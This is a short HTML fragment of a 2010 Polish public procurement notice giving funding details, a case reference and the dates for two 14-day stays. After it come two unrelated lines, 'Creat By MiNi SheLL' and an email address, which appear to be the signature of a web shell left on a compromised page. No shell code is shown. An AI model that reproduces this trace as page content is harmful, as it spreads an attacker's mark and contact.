<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1/ zamówienie nie jest finansowane ze środków Unii Europejskiej, 2/znak postępowania: OPiTU/ZP/N/1/10, 3/ szczegółowy opis terminu wykonania zamówienia: dwa turnusy, każdy 14 (czternasto) dniowy (13 nocy, 14 dni ) w okresie od 28 czerwca 2010 roku do dnia 15 sierpnia 2010 roku.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com